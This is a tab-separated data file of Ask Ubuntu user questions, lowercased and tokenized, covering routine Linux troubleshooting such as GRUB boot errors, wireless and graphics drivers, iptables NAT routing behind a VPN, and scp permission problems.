388055	lubuntu 13.10 on hp pavilion laptop	just installed lubuntu 13.10 on an old hp pavilion laptop that formerly ran win xp . did full install without any problems . i have restarted the machine a few times but it seems unable to get past the lubuntu splash screen . the six little dots that light up in sequence to indicate progress just go on and one with no apparent end . i 'm not a complete newbie to ubuntu , but i am not familiar with lubuntu and i 'm installing it on a dell dimension 3000 pc as it can no longer work with ubuntu upgrades from 12.04 onward . any suggestions would be greatly appreciated . thanks . mig
388056	wireless connection works , but the wired connection disconnnects every 5 minutes	i have a problem . my ubuntu 12.04 64 bit has wireless working fine , but the wired connection loses connectivity roughly every 5 mins . ubuntu recognizes it as eth0 interface and shows it to be connected at all times , but after around 5 min it loses connectivity , i.e . pages do not open , downloads get stuck , etc . if i disconnect/connect it works fine for another five mins . anyone has an idea what is causing this and perhaps how to solve it ? cheers , isnax
388059	uefi boot order on	i 'm trying to replace win8 with ubuntu 12.04.3 server by booting via usb boot stick . i disabled uefi but am not sure what needs to be done in uefi boot priority setting . the bios screen says `` usb boot '' is [ enabled ] ; but the `` uefi boot priority order '' shows `` windows boot manager '' , and then `` efi network 0 for ipv4 '' . those are the only 2 options . rebooting as is with these settings just boots into win8 .
388060	unity launcher resets on reboot and unity tweak tool no longer working	i have a new issue to report . as of this morning , on startup , my entire ubuntu system looked a little different . what i discovered was that my unity launcher had reset to their primal defaults ( i.e . files / firefox /libre writer/ amazon/ etc ) . second issue i notice was that none of my settings applied to the unity tweak tool no longer work . hot corners are no longer activated , animations are re-enabled , and many other settings i have disable upon install . now , granted , i have no time today to do clean install , but that seems to be the only solution thus far . unfortunately , this would require hours of backup and other tedious notes for all software that leads me to not want to resort to that solution . i 've browsed ask ubuntu as well as google , and this issue has yet to arise for this flavor of ubuntu . what is bothersome is going to compiz config has unity tweak tool available but no check box ? also , when trying to select the checkbox within its selection reports conflicts with a variety of commands . if anyone has any solutions , i would greatly be in your favor ! as requested by seth , here is the output output of apt-cache policy unity-tweak-tool : 1 unity-tweak-tool : ¬ 2 installed : 0.0.6¬ 3 candidate : 0.0.6¬ 4 version table : ¬ 5 *** 0.0.6 0¬ 6 500 http : //us.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages¬ 7 100 /var/lib/dpkg/status¬ 8 0.0.4 0¬ 9 500 http : //archive.ubuntu.com/ubuntu/ raring/universe amd64 packages¬ moreover , when i call dconf watch / on terminal -absolutely no results are echoed when i either change items in my system preferences nor my unity tweak tool : there is a ppa for calibre in which i notice that it threw an error for an amd64 binary -similar to the amd64 package above . could these two errors be related to a bigger issue wihh amd64 ? w : failed to fetch http : //ppa.launchpad.net/n-muench/calibre2/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/n-muench/calibre2/ubuntu/dists/saucy/main/binary-i386/packages 404 not found
388061	ca n't create a folder on my newly created partition	if i have a partition : /dev/sda3 how do i take ownership so that i can create folders ? i tried : sudo chown -r chris : chris /dev/sda3 sudo chmod -r 755 /dev/sda3 but when i right click within the folder 'create new folder ' is still greyed out ? thanks for any assistance .
388068	how can i find out bits per pixel using into my framebuffer ?	i know the x.org server run is executed with certain value of bpp , 8bpp by default i think . but how can i find out the actual bits per pixel using into my framebuffer while i 'm on linux ? is there any command that can get it ? thanks .
388069	firefox black artifacts on optimus when on ac power	when using firefox i often get lots of black random artifacts ( little black rectangles ) . it usually happens when i scroll a page . the strangest part is it happens only when my notebook is on ac power . i know this problem is optimus related , i 've already tried to disable hardware acceleration in firefox , but it did n't work . also , i 've tried to follow instructions posted at this question . still no luck . here is an example of my problem i use ubuntu 13.10 with working bumblebee and nvidia-319 drivers . notebook model is acer v3 772g with discrete geforce gtx 760m . i would appreciate any help .
388070	packaging non-sdk app as click ?	i have a program that i created using free pascal lazarus , and i would like to share it in ubuntu , but how do i pack it with .click ? i have read this http : //developer.ubuntu.com/publish/apps/packaging-click-apps/ but my program has nothing to do with ubuntu sdk , or qt creator , it is just a linux program , maybe uses gtk , so how can i pack it with .click ? thank you very much .
388072	how do i install java ? want to play minecraft	complete novice at ubuntu . trying to set up minecraft to play through ubuntu but saying i need to install plug ins to see them and my minecraft wo n't play as it 's a jar file instead of a exe file ?
388074	i fixed grub error after ubuntu install with cd fix , but	i fixed grub error after ubuntu install with cd fix , but now i am only booting to xp . how do i get ubuntu to boot ?
388076	wifi drivers hp 4540s.how to install ?	my wifi disconnect when i download.in some networks , a connection but does not open sites . lspci : 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 03:00.1 bluetooth : ralink corp. rt3290 bluetooth 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) lspci -v : 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) subsystem : hewlett-packard company device 17f6 flags : bus master , fast devsel , latency 0 , irq 45 i/o ports at 2000 [ size=256 ] memory at d0404000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169
388080	screen tearing with second monitor using fglrx on 13.10	i 'm having two issues with ubuntu 13.10 but i 'll ask each one in a differnt thread . my laptop has amd/intel switchable graphics . i was using 12.04 until i decided that i wanted the latest software and installed 13.10 . on 12.04 multiple monitors worked just fine with fglrx . but with 13.10 , multiple monitors only work with the intel driver . any version of the fglrx driver that i try will give me really bad screen tear with a second monitor connected to my laptop . it looks like the both screens want to be on both monitors and as i move the mouse cursor across the screen i 'll see both screens flash on top of each other . is this a bug ? and how would i report it ? here 's hoping someone can help me with a fix . thanks for any help !
388083	javac is not in the jdk path but java -version says jdk is installed	when i type javac in the terminal , this is what i get : the program 'javac ' can be found in the following packages : * default-jdk * ecj * gcj-4.6-jdk * openjdk-6-jdk * gcj-4.5-jdk * openjdk-7-jdk try : sudo apt-get install < selected package > i want to try the suggestions from this post : http : //stackoverflow.com/a/8864640 but i ca n't find the reference to the javac . i expected to find javac inside /usr/lib/jvm/java-1.7.0-openjdk-amd64/bin but it 's not there . what should i do to get javac working since it 's not where it is supposed to be ? this is what i get for java -version : java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.10 ) ( 7u25-2.3.10-1ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) so i guess jdk is properly installed . thanks in advance !
388084	when try to boot only get `grub > `	i have an hp touchsmart with 2 tb hd and windows 7 . made a partion of 1 tb to locate ubuntu and have dual boot . when i get the choice for windows 7 or ubuntu and run ubuntu i only get grub >
388091	opengl with os x 10.9 + virtualbox 4.3.4 + ubuntu 13.10	i am running ubuntu in virtualbox with an os x host . i am trying to test an opengl application that needs gl shader language 3.3 or higher , but glxinfo is reporting 1.20. glxinfo | grep opengl shows : opengl vendor string : humper opengl renderer string : chromium opengl version string : 2.1 chromium 1.9 opengl shading language version string : 1.20 opengl extensions : i have installed the virtualbox guest additions and i have tried increasing the video memory to 128 mb and i have tried enabling and disabling 3d acceleration in virtualbox . what can i do to get a newer shading language version ? i 've seen much higher versions searching google with the same chromium version . thanks !
388092	how to proxy to a vpn connected server with local services running ?	i 'm having trouble accessing services that are running on my linux box from outside the local network . the setup is not as simple as most tutorials describe so i 'm a bit stuck . my linux box ( running ubuntu 12.04 ) has a static ip of 192.168.0.66 . this linux box has several services running on ports between 2600 and 2699 ( transmission , apache2 , xbmc etc ) ... my raspberry pi has a static ip of 192.168.0.169 . both connect to the gateway router 192.168.0.1 . ports ( 2600-2699 ) are forwarded from the router to the pi . and on the pi i nat any connections like this : iptables -t nat -a prerouting -p tcp -- dport 2600:2699 -j dnat -- to-destination 192.168.0.66 iptables -t filter -a forward -p tcp -- dport 2600:2699 -j accept iptables -t nat -a postrouting -p tcp -- dport 2600:2699 -j masquerade so far so good , and when i access a service on a port in the range 2600-2699 via the internet on my phone ( not on the local wifi ) then it works fine without any ip rules or iptables config on the linux box . the problem : i use a vpn on the linux box and as soon as it is connected then the packets sent to linux box services are not working to the pi and natted back to where they came from on the wan . the default route is deleted whilst connecting to the vpn which used to point to the local router ( 192.168.0.1 ) and replaced with the vpn ip address so i understand why it does n't work . although i can still ping my pi from the linux box whilst connected to the vpn . this is my iptables on the linux box , first mark the packets as they come in from the pi to be able to track them easily : iptables -t mangle -a prerouting -s 192.168.0.169 -d 192.168.0.66 -p tcp -- dport 2600:2699 -j mark -- set-mark 1 i can see the matched packets count up as i try to access the service . and i can use similar rules to see them make it to the filer input table , and i can see them count up in the filter output and mangle postrouting table when i write the rules with source and destination swapped , although they do n't have any of the fwmarks on these tables . but , when i write a rule on the nat postrouting table they do not get matched so i 'm not sure what happened to them . my solution was to create a new policy routing table on the linux box which will still point traffic to the local gateway for matching marked packets . # ip rule add fwmark 1 table foo # ip route add default via 192.168.0.1 dev eth0 table foo which results in these rule tables and routes : # ip rule show 0 : from all lookup local 32765 : from all fwmark 0x1 lookup foo 32766 : from all lookup main 32767 : from all lookup default # ip route show table foo default via 192.168.0.1 dev eth0 how i think it works : from my understanding this should work and i 'm stuck having spent many hours trying to solve it . packets come in from wan hit the router and get natted to the pi . packets get to the pi and destinations are changed to linux box and masqueraded so the source is the pi ip address . packets get to the linux box and are marked with fwmark 1 and then find their way to the service . the service deals with it and replies back to the source ip ( which is the pi now ) , the destination and source ip 's are swapped ( ? ) the routing tables and rules should match the fwmark 1 and route the packets to the local gateway 192.168.0.1 the gateway will push this back to the pi as the destination is 192.168.0.169 . the pi nat rule should then return it to the wan where it came from . what am i getting wrong ? please tell me if there is anything i am not understanding of how this all works and explicit instructions are welcomed ( especially if it involves netstat or tcpdump ) and any extra details can be provided if necessary . thanks in advance , i have wasted so many hours researching and trying to get this working .
388097	mysql service status	i recently was trying to restart mysql when i ran into an error where it was hanging at `` mysql stop/waiting '' i then went to uninstall mysql , but even with mysql-server and mysql-client uninstalled i still get `` mysql stop/waiting '' status . how can i completely remove mysql ?
388098	no dvd reinstalled windows , ran boot-repair and now no dvd ubuntu 13.01	as mentioned in title i reinstalled my alongside windows , ran boot-repair and then update grub . everything seems fine now except no access to dvd reader/writer . dvd read in bios and windows , but not at all in ubuntu whether disk in or not . not on launch pad or in home folder under devices . lshw command does show the appropriate device . /media contains nothing related to cdrom ( only floppy ) . i understand i am suppose to enter command cd mkdir /media/ [ folder name ] but i do n't know the folder name . thanks for help . dalton
388099	ca n't access my hard drive over netgear readyshare	i have an external fantom hard drive with 2 tb and a netgear wndr3400v2 with readyshare . ubuntu 12.10 sees the brysfantom ( the name i gave it ) but when i try to open it , but it wo n't . i have n't installed anything else . i 'm first time user moved from windows .
388100	launcher properties / display	i wish that the launcher has some properties which we can access / change with right click ( like in windows ) . also , the launcher location at the left side keeps bothering me and would prefer to have it at the bottom . is there a solution for both ? i use ubuntu 12.04 and am pretty new to linux and would prefer if i do n't have to run commands from the terminal and could do this with a nice gui .
388103	fan maxes out and battery status indicator flashes	i have recently installed ubuntu on my asus ux301la which has raided ssds and is in uefi . install is fine and everything works , however sometimes when i boot my fan maxes out and my battery status indicator on the power cord flashes . i 'm not really sure how to troubleshoot as i 'm fairly new . if i were to boot into windows with the led blinking it would say plugged in but not charging . this laptop is brand new just received it about 3 days ago and has n't always had these symptoms . the symptoms started after booting to linux . also the fan does n't max out every time . i know the laptop is n't hot since it 's just booting so there is no need for the fan . any help is greatly appreciated ! thank you !
388105	ca n't connect wirelessly to my wpa2 home network with v 13.10	i did n't not install ubuntu 13.10 yet , i tried it on a live dvd 1st . everything is working except my wireless connection to my wpa2-psk home network with aes encryption . i can see my wireless home network ( and others ) , and ubuntu asks me to enter my password ( as it should ) , but still unable to connect , so it keeps asking me to enter the password again . i am absolutely sure of the password and if i reboot my pc on windows xp , i can use without any problem my wireless network card ( realtek usb nano ) . also , i saw a very similar question , where it seems that the wireless connection is working with tkip encryption but not with aes . it is possible that it could work with aes ? thanks
388107	geforce gtx 6500 ti screen tearing problems	i 'm experiencing the tearing artifacts on geforce gtx 6500ti graphics card under ubuntu 12.04 . apart from tearing , the card runs games decently . on my old video card ( geforce 9800gt ) i 've had absolutely no tearing on the same system . the tearing is especially noticeable when : moving windows horizontally , in upper half of the screen , watching div-x videos ( in my opinion it makes movies unwatchable ) , the artifacts are also mostly located in upper half of the screen in some 3d games , but not all of them . my system is : 1920x1080 monitor connected through dvi amd athlon ( tm ) ii x2 250 processor 8 gb ram system installed on ssd , home drive on hdd if there are other users of this card ( or generally 6xx family ) , i 'd like to know if are having this kind of issues or is your system running fine ? by having this answer i may get a clue where should i seek for solution . what i 've checked so far : i have tried all proprietary drivers available in `` additional drivers '' window and situation is more or less the same with every one of them . i 've confirmed that on ubuntu 13.10 tearing is probably a little lighter but still noticeable and annoying . i have tried disabling the adaptive power management ( as explained in this answer ) which seems to alleviate the problem but the tearing is still there .
388112	grub out of disk error	after installing , when i reboot i get : error : out of disk . grub rescue > what is wrong ?
388114	/etc/x11/xorg.conf not displaying any text ( ubuntu 13.10 )	i 'm trying to change the driver to intel because i 'm following a guide on getting my laptop to work with ubuntu ( http : //homeport.org/~bcordes/satellite-l500-install.html ) and one of the steps is run sudoedit /etc/x11/xorg.conf . in the device section at the top change the driver from `` vesa '' to `` intel '' . save and quit . this change will take effect when next you reboot .
388115	is it possible to switch to root at login ?	say i login to my ubuntu server as user `` bob '' and i want all my actions to be performed with sudo , is it possible to set some kind of permanent sudo automatically at login ? alternatively , if the login could be automatically `` redirected '' to root using sudo su or something similar , that would work . right now i just login normally , and then immediately run sudo su ( if i remember ) . i 've been halfway editing a document too many times , only to realize i 'm not editing as root .
388118	thinkpad x201 touchscreen missing on resume	i am running ubuntu 13.10 on a thinkpad x201 with a wacom touchscreen . the touchscreen seems to work fine , but upon resume after suspending , the touchscreen does not work . it actually does n't even show up when i run : xsetwacom -- list i initially had ubuntu 13.04 on this laptop but these issues only came into existence once i upgraded to the latest release . the only way i seem to be able to get the touchscreen working again is if i reboot or run : sudo lightdm restart is there some way i can force a reload of the necessary components to use the touchscreen upon resume ? sidenote : one other annoying thing which does n't work after upgrading is the rotate button at the bottom of the screen .
388124	oovoo will not install	i have tried to install oovoo but for some reason it gets freezes at 90 % . i have wine but for some reason it still isnât working .
388126	which is the best c++ ide for ubuntu ?	is there a c++ integrated development environment ( ide ) for ubuntu . i want a ide similar to turbo c++ in windows .
388127	keyboard not working at decryption screen ubuntu 13.10	ok , before everyone screams duplicate , my scenario is unique because i 've exhausted what options i can comprehend and there are n't any clear answers available . i feel it will valuable to have this answer available for beginners who wo n't want to go through the install process a second time just to have to figure out how to fix this then figure how to encrypt system via command line . i 've done a clean install of ubuntu 13.10 with filesystem encryption ... i chose to have updates applied as it was installed , but of course the notorious `` keyboard not working at the 'enter passphrase : ' '' reared it 's ugly head . what ca n't be done ; this is a fresh install to a virgin hard drive ( that was another fun bug to figure out btw ) so using an older kernel is n't an option . ( afaik ) what i 've tried ; booted live cd and `` try ubuntu '' . mounted encrypted filesystem as to have access to it . fired up a terminal ( ctrl alt t ) sudo mount -- bind /dev /media/ubuntu/*driveid*/dev/ sudo mount -- bind /proc /media/ubuntu/*driveid*/proc/ sudo mount -- bind /sys /media/ubuntu/*driveid*/sys/ sudo chroot /media/ubuntu/*driveid* nano /etc/initramfs-tools/modules added a host of modules under the comments , one on each line . # list of modules that you want to include in your initramfs . # they will be loaded at boot time in the order below . # # syntax : module_name [ args ... ] # # you must run update-initramfs ( 8 ) to effect this change . # # examples : # # raid1 # sd_mod ohci_pci hid usbhid hid_generic hid_logitech hid_logitech_dj mac_hid ctrl+o to write out enter to save the file ctrl+x to close nano update-initramfs -u unmount everything ( not sure if necessary but i did ) , restart without ubuntu cd , problem persists ... edit : i should also note , that i changed the cryptkey= '' unlocking the disk driveid enter passphrase : '' to `` by your command : '' in media/ubuntu/*driveid*/usr/share/initramfs-tools/scripts/local-top/cryptroot however it still comes up as unlocking the disk *driveid* enter passphrase : on reboot keep in mind however i did this after my first attempt to do the above list , so it has nothing to do with why the keyboard wont work even after my attempted fix , but it does lead me to ask if this string has n't changed then has the update-initramfs -u worked at all or am i still not loading those modules . here 's the output i get after running update-initramfs -u root @ ubuntu : / # update-initramfs -u update-initramfs : generating /boot/initrd.img-3.11.0-12-generic grep : /boot/config-3.11.0-12-generic : no such file or directory cryptsetup : warning : invalid line in /etc/crypttab for luks-1ca6df5d-4b58-4c47-a5ec-7e6594305900 - edit 2 : doing sudo mount -- bind /boot /media/ubuntu/*driveid*/boot before chroot-ing got rid of the grep : /boot/config-3.11.0-12-generic : no such file or directory so apperently it was pointing to the wrong /boot ( the live cd boot instead of the hard drive ) however , this still has not caused `` by your command : '' to appear and the keyboard still does not function
388128	how can i use a printer	a new hp envy 4500 printer will print on windows xp but not on ubuntu 12.10 . how can i fix it ? i have unplugged and replugged the power and the usb connector and played the dvd that came with the printer . when i send a selection to the printer it displays `` now printing in the display on the printer but it does n't print . it printed a test file once immediately after i set it up.then it stopped printing
388130	how do i cam migrate vb apps to qml	i have lots of vb tools , activex controls and full apps developed in the last 15 years . now , i 'm writting apps using python , and php . and i 'm thinking on migrating my software to open platforms . i 'd like ubuntu , in particular , as i 'm ubuntu user since 12.04 appears . how difficult will be the job if i select qml as migration target ?
388132	formatting hdd to ext 2 hangs at writing inode tables	not sure if this is the right place for this question , but i 'm attempting to format the /dev/sda1 partition of my hard drive to ext 2 but it hangs at writing inode tables . does this mean my hard drive is damaged or is there a work around ? linux-noob so be friendly : ) edit : i should add that i am attempting to format the partition using g-parted from a liveusb running ubuntu 13.10 . i had a boot error on this ubuntu partition and boot-repair did n't work to fix it and nor did e2fsck .
388135	ca n't start up chrome	i am running ubuntu 13.10 . the chrome browser wo n't start . this is what i get when i start it via the terminal : aborted any help would be appreciated . cheers
388136	i am not able to use wireless networks when i updated linux-firmware in ubuntu 12.04	i have taken new laptop , first i was using wifi , but once i updated the updates available , i am not able to use wifi , its not showing wifi networks , please tell me the solution for this .
388138	/boot not enough disk space !	i would call myself a step above a noob when it comes to linux and ubuntu , but i 'm having trouble here . i use my ubuntu laptop as a torrent slave , and there is never any files saved on it for long so if the answer to my question requires a full reinstall , that is ok . i have ubuntu 13.10 and these keep coming up ( see attached imgur links ) `` not enough disk space on /boot . now this is the ubuntu drive correct ? so my real question is : `` is there a way to increase the size of this drive without reinstalling ubuntu ? thanks a lot guys !
388143	keyboard not working in ubuntu 13.10	well , my keyboard does n't work on ubuntu if i run it on kernel 3.11 at the start-up screen there are error messages : atkbd serio0 failed to enable keyboard on isa0060/serio0
388144	want to remove ubuntu	i bought dell vostro 2520 in which ubuntu was already installed . i want to uninstall ubuntu and install win7 on that machine . for that i used gparted on ubuntu and had eraseed partiion of ubuntu . and for install win7 i used win7 dvd from boot optionn , but laptop not getting boot via dvd . even i tried bootable pan drive of win7 but had same problem . i have ubuntu live cd . is there any solution for this problem ? plz show me step by step .
388146	firefox/java/pogo games not working	i have recently upgraded to ubuntu 13.10 and firefox 25.0.1 and am no longer able to play games on pogo . i get messages that the java is out of date and also for flash being out of date . appreciate any assistance . thanks . david
388147	steps to recompile cgminer to allow intensity to be increased above 20 ?	does anybody know the steps to recompile cgminer on ubuntu ? running 12.10 , but should be the same for any version . i have it up and running , but would love to redo it in a manner to allow me to pump the intensity up a bit higher .
388148	need to add to add `` boot from usb '' to uefi boot priority order	i 'm trying to replace win8 with ubuntu on a new lenovo ideapad s10 with 4gb mem,500gb h/d . drilling down , i disable `` secure boot '' on the bios boot tab , but the only 2 options under uefi boot priority order are windows boot mgr and efi network . no `` boot from usb '' option . someone here kindly suggested a link which reported they got added options by changing '' secure boot mode '' under the `` security '' tab to `` legacy '' but on my pc , that option is n't selectable , ie , the selection cursor just bypasses that selection . the only 2 selectable options are `` reset to setup mode '' and `` restore factory keys '' . anyone know who/where the usual suspects are hiding ? how to flush them out ?
388151	what is the ubuntu equivalent of the windows start menu ?	is there an equivalent of the windows `` start menu '' in ubuntu from where all installed programs can be easily accessed ?
388153	ubuntu 13.10 not usable because of focus problems	i tried to set up ubuntu 13.10 , but there are massive focus problems which make it unusable . it do n't seems to have something to do with unity where i found something about focus problems in the web . while the installation process the first problems happened : sometimes i was not able to press a button with the mouse . in this case i took the keyboard . but when the window manager is started , ubuntu gets unusable for me . sometimes the focus seems to stick in a window . when this is the case , i can move the mouse over an other window , but i am not able to set the focus in it - it stays in the other window . also if i use `` alt-tab '' . sometimes it even happens that focus of keyboard sticks in one window and focus of mouse in an other . the strange thing is that this happens in 8/10 boots . so not every time , but most of the time . i already tried to use gnome desktop because i thought it might have something to do with unity , but it was the same there . ms windows works without problems on this hardware . i found a very similar question here with ubuntu 12.04 . i also use chrome so it might be related to it . but for me it happens with all windows if the problems start : mouse and keyboard focus problem have you some ideas ? did you already hear of such problems ? what logs might be interesting ? thanks !
388154	running a script in a screen at start up	i have a python script that i wish to keep running all the time on an ubuntu 12.04 machine , and i am doing so by adding an init job that runs a short script that checks for a screen session and if not present creates one . /etc/init.d/my-script : path=/sbin : /bin : /usr/sbin : /usr/bin case `` $ 1 '' in start ) /usr/local/bin/start.sh ; ; stop|restart|force-reload ) ; ; * ) ; ; esac exit 0 /usr/local/bin/start.sh : # ! /bin/bash path=/sbin : /bin : /usr/sbin : /usr/bin screen_name= '' my-script '' invocation= '' ./my-script.py '' # make sure we are in the working directory . cd /usr/local/bin if ! screen -list | grep -q `` $ { screen_name } '' ; then screen -dms `` $ { screen_name } '' `` $ { invocation } '' fi the problem is that the screen is not being created when i run /etc/init.d/my-script start . it runs fine when i execute ./start.sh and when i debugged it , it definitely executes the screen statement inside the if statement , and the exit code from screen is 0 . so why does n't it create the screen ?
388155	the usb drive is read only even write protection is off	i have made my transcend usb 3.0 pendrive into bootable arch-linux key using dd command . after that it become read only and i was not able to use it . so i formatted as mbr with ntfs partition using disk utility in ubuntu and there were no errors , but when i try to use it , it saying read-only and not allowing to copy anything.here is the screenshot of the error . i had tried reformatting as gpt , the same error . i have tried ext4 also.i have ran fsck command also , it says everything is clear . the following is the output of dmesg | tail -n25 [ 5399.004036 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:2c:41:38 : db:7e : b7:08:00 src=0.0.0.0 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5413.351497 ] type=1400 audit ( 1386569943.739:66 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=8956 comm= '' cupsd '' pid=8956 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 5438.323077 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:2c:41:38 : c8:82:00:08:00 src=169.144.44.1 dst=224.0.0.1 len=32 tos=0x00 prec=0x00 ttl=1 id=31744 proto=2 [ 5463.333598 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:2c:41:38 : db:7e : b9:08:00 src=0.0.0.0 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5472.271930 ] usb 2-1.5 : usb disconnect , device number 3 [ 5479.546220 ] usb 2-1.5 : new high-speed usb device number 4 using ehci_hcd [ 5479.639030 ] usb 2-1.5 : new usb device found , idvendor=8564 , idproduct=1000 [ 5479.639039 ] usb 2-1.5 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 5479.639044 ] usb 2-1.5 : product : mass storage device [ 5479.639047 ] usb 2-1.5 : manufacturer : jetflash [ 5479.639052 ] usb 2-1.5 : serialnumber : 1250498862 [ 5479.639699 ] scsi17 : usb-storage 2-1.5:1.0 [ 5480.636704 ] scsi 17:0:0:0 : direct-access jetflash transcend 8gb 1.00 pq : 0 ansi : 6 [ 5480.637548 ] sd 17:0:0:0 : attached scsi generic sg2 type 0 [ 5480.638034 ] sd 17:0:0:0 : [ sdb ] 15433728 512-byte logical blocks : ( 7.90 gb/7.35 gib ) [ 5480.638406 ] sd 17:0:0:0 : [ sdb ] write protect is off [ 5480.638415 ] sd 17:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 5480.638771 ] sd 17:0:0:0 : [ sdb ] write cache : disabled , read cache : disabled , does n't support dpo or fua [ 5480.650924 ] sdb : sdb1 [ 5480.652992 ] sd 17:0:0:0 : [ sdb ] attached scsi removable disk [ 5480.798379 ] ext4-fs ( sdb1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 5486.400055 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:2c:41:38 : db:7e : ae:08:00 src=0.0.0.0 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5486.826155 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:2c:41:38 : db:7e : af:08:00 src=0.0.0.0 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5487.220538 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:2c:41:38 : db:7e : ba:08:00 src=0.0.0.0 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ 5514.209561 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 6 update : this is weird , i have formatted as fat , i have checked the permissions , it is normal ( -rw-r -- r -- ) . i have opened terminal and used mkdir and a directory is created . i am able to create files also from cmdline , but whenever i try to access through nautilus , the error mentioned at the start is occuring . i have checked in my friend 's laptop , there is no problem . still ca n't understand the problem .
388157	installing systemtap on ubuntu 12.04	i have installed systemtap on ubuntu 12.04 by following this link . my kernel version is 3.2.0-23-generic-pae and i installed debug version : `` linux-image-3.2.0.23-generic-dbgsym '' on system but now i am getting this error when running command stap -v -e 'probe vfs.read { printf ( `` read performed\n '' ) ; exit ( ) } semantic error : missing i386 kernel/module debuginfo under '/lib/modules/3.2.0-23-generic-pae/build ' while resolving probe point kernel.function ( `` vfs_read '' ) please help me !
388158	how to copy from localhost to remote server	i am trying to copy a file in my /home folder hello.txt to remote host mak - scp hello.txt mak @ 10.0.34.22 : /home/me but on copying i am getting the following error : scp : /home/me//hello.txt : permission denied i have even changed the ownership of hello.txt to root , but still it gives permission denied error . what should be done to copy copy the file to remote server ? i got the answer for copying to remote server home folder . i used : scp hello.txt mak @ 10.0.34.22 : and the file hello.txt got copied to home folder of remote server , but still the file when copied to specific folder does not got copied and gives the same error .
388160	updating particular linux driver	since i am new to this kernel tweaking i am stuck in updating the quirk to the system requesting some little time to help me on the same currently i am trying to work with my kernel : i am trying to make my chipset ( ich7 - m ) to support ahci in my debian 6 ( linux-source-2.6.32 ) . with mentioned link 's ref : http : //tartarus.org/~ds/quirk-ich-force-ahci.patch http : //tartarus.org/ % 7eds/quirk-ich-force-ahci.patch i cooked the quirk.c in my work machine and compiled the kernel make subdirs=drivers/pci/ and make module subdirs=drivers/pci/ after successful compilation i copied the `` pci-stub.ko '' from linux-source-2.6.32/drivers/pci to test machine 's : '' /lib/modules/2.6.32-5-686/kernel/drivers/pci '' path and then set quirks.ich_force_ahci=1 in /etc/grub/grub.conf and rebooted the system but after reboot my ide is using ata_piix driver not ahci driver . do n't know what is error.request some guidance on applying the patch regards venkat.s
388162	`` warning : root : file 'saucy.tar.gz.gpg ' missing '' on distribution upgrade	i 'm trying to upgrade from 13.04 to 13.10 following this guide : http : //www.unixmen.com/upgrade-ubuntu-13-04-raring-ubuntu-13-10-saucy-salamander/ user @ computer : ~ update-manager fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . gpg : /tmp/tmp82g1kk/trustdb.gpg : trustdb created checking for a new ubuntu release warning : root : file 'saucy.tar.gz.gpg ' missing traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 152 , in < module > fetcher.run ( ) file `` /usr/lib/python3/dist-packages/distupgrade/distupgradefetchercore.py '' , line 278 , in run _ ( `` fetching the upgrade failed . there may be a network `` file `` /usr/lib/python3/dist-packages/distupgrade/distupgradefetcher.py '' , line 50 , in error return error ( self.window_main.window_main , summary , message ) attributeerror : 'nonetype ' object has no attribute 'window_main'
388164	nodejs app is starting everyday and eating up memory	i was trying to run ghost node.js application on my ubuntu server . since i am mostly experimenting with linux systems i have tried a bunch of things and finally managed to make ghost run on server restart using forever package and the following upstart script . description `` node.js ghost aps '' start on started stop on shutdown script export path= '' /home/deploy/local/bin : $ path '' export node_env=production cd `` /home/deploy/web-apps/ghost/ '' exec forever start `` /home/deploy/web-apps/ghost/index.js '' -e `` /home/deploy/web-apps/ghost/error.log '' end script but after sometime i noticed that the number of running scripts is increasing everyday and eventually causing out of memory errors . info : forever processes running data : uid command script forever pid logfile uptime data : [ 0 ] unyu /home/deploy/local/bin/node /home/deploy/web-apps/ghost/index.js -e /home/deploy/web-apps/ghost/error.log 530 752 /root/.forever/unyu.log 2:22:4:30.155 data : [ 1 ] 73wg /home/deploy/local/bin/node /home/deploy/web-apps/ghost/index.js -e /home/deploy/web-apps/ghost/error.log 2563 2573 /root/.forever/73wg.log 0:23:31:55.579 how and where should i check to see what is starting these scripts ?
388167	how can i force all applications to use $ xdg_config_home instead of ~/.app ?	as far as i understand , the xdg guidelines recommend that applications store their configuration in $ xdg_config_home/app ( usually ~/.config/app ) rather than ~/.app ( i 'm not sure if there are also debian/ubuntu guidelines ? ) . however , i have found a number of configuration files and folders using the older ~/.app convention . is there a way to globally force non-confirming applications to use the xdg folder conventions ? or do i just have to log a ticket with each project ? : d
